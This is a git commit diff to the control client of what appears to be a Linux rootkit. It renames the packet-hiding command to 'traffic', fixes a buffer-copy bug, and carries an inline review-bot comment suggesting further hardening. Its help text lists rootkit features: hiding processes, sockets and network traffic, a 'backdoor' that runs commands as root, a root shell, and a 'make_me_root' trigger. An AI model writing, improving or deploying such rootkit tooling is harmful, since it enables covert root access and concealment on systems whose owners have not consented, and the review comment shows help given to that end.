
commit d0029f1120d9c0d02821c6295c8093ab4fa7e25b
parent 9a24a6beaa28e244d39ce9e006aa183f119016c6
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 20 Dec 2020 21:00:47 +0100

changes command syntax from `packet` to `traffic`

Diffstat:
Msrc/rkctl/rkctl.c | 18+++++++++++-------
1 file changed, 11 insertions(+), 7 deletions(-)

diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -121,16 +121,18 @@ parse_input(int argc, char **argv)
 if (ARGVCMP(1, "sockethide-off"))
 return (cmd_t){ handle_tcphide, (void *)0 };
- if (ARGVCMP(1, "packet")) {
- ASSERT_ARGC(3, "packet <hide | unhide> <ip>");
+ if (ARGVCMP(1, "traffic")) {
+ ASSERT_ARGC(3, "traffic <hide | unhide> <ip>");
 if (ARGVCMP(2, "hide")) {
 size_t arglen = strlen(argv[3]);
 size_t maxlen = BUFLEN - 1;
 char *hide_ip = (char *)malloc(BUFLEN);
+ memset(hide_ip, 0, BUFLEN);
 hide_ip[0] = (char)1;
- memcpy(hide_ip + 1, argv[3], arglen < maxlen ? arglen : arglen);
+ memcpy(hide_ip + 1, argv[3], arglen < maxlen ? arglen : maxlen);
+
 return (cmd_t){ handle_packhide, (void *)hide_ip };
 }
@@ -138,13 +140,15 @@ parse_input(int argc, char **argv)
 size_t arglen = strlen(argv[3]);
 size_t maxlen = BUFLEN - 1;
 char *unhide_ip = (char *)malloc(BUFLEN);
+ memset(unhide_ip, 0, BUFLEN);
 unhide_ip[0] = (char)-1;
- memcpy(unhide_ip + 1, argv[3], arglen < maxlen ? arglen : arglen);
+ memcpy(unhide_ip + 1, argv[3], arglen < maxlen ? arglen : maxlen);
+
 return (cmd_t){ handle_packhide, (void *)unhide_ip };
 }
 }
- if (ARGVCMP(1, "packethide-off"))
+ if (ARGVCMP(1, "traffichide-off"))
 return (cmd_t){ handle_packhide, (void *)0 };
 if (ARGVCMP(1, "backdoor")) {
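Review bot: The new `memset(hide_ip, 0, BUFLEN)` dereferences the result of `malloc(BUFLEN)` without checking it, so an allocation failure now faults right here in parse_input rather than in the handler; the second hunk has the same unchecked pattern with `unhide_ip`. Replacing the malloc/memset pair with `char *hide_ip = calloc(1, BUFLEN);` followed by `if (!hide_ip) { perror("calloc"); exit(EXIT_FAILURE); }` (or whatever failure path ASSERT_ARGC uses, which is not visible here) zero-fills and checks in one step. Separately, when arglen >= maxlen the corrected memcpy fills bytes 1..BUFLEN-1 completely, so the zero-fill no longer guarantees a NUL inside the buffer and an over-long address is silently truncated; if handle_packhide reads the payload as a C string (not visible here), it would be safer to reject with `if (arglen >= maxlen) ...` than to truncate. parse_input begins before the first hunk and continues past the second.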
@@ -300,8 +304,8 @@ help()
 printf("%-42s %s\n", "hidepid <add | rm> <PID>", "{,un}hide a process");
 printf("%-42s %s\n", "socket <hide | unhide> <tcp | udp> <port>", "{,un}hide a tcp or udp socket with the given port");
 printf("%-42s %s\n", "sockethide-off", "disable any (tcp or udp) socket hiding");
- printf("%-42s %s\n", "packet <hide | unhide> <ip>", "{,un}hide packets from/to given ip address (IPv4 or IPv6)");
- printf("%-42s %s\n", "packethide-off", "disable any packet hiding");
+ printf("%-42s %s\n", "traffic <hide | unhide> <ip>", "{,un}hide packets from/to given ip address (IPv4 or IPv6)");
+ printf("%-42s %s\n", "traffichide-off", "disable any traffic hiding");
 printf("%-42s %s\n", "backdoor <execve_command>", "exec a command as root");
 printf("%-42s %s\n", "shell", "obtain a shell as root");
 printf("%-42s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)");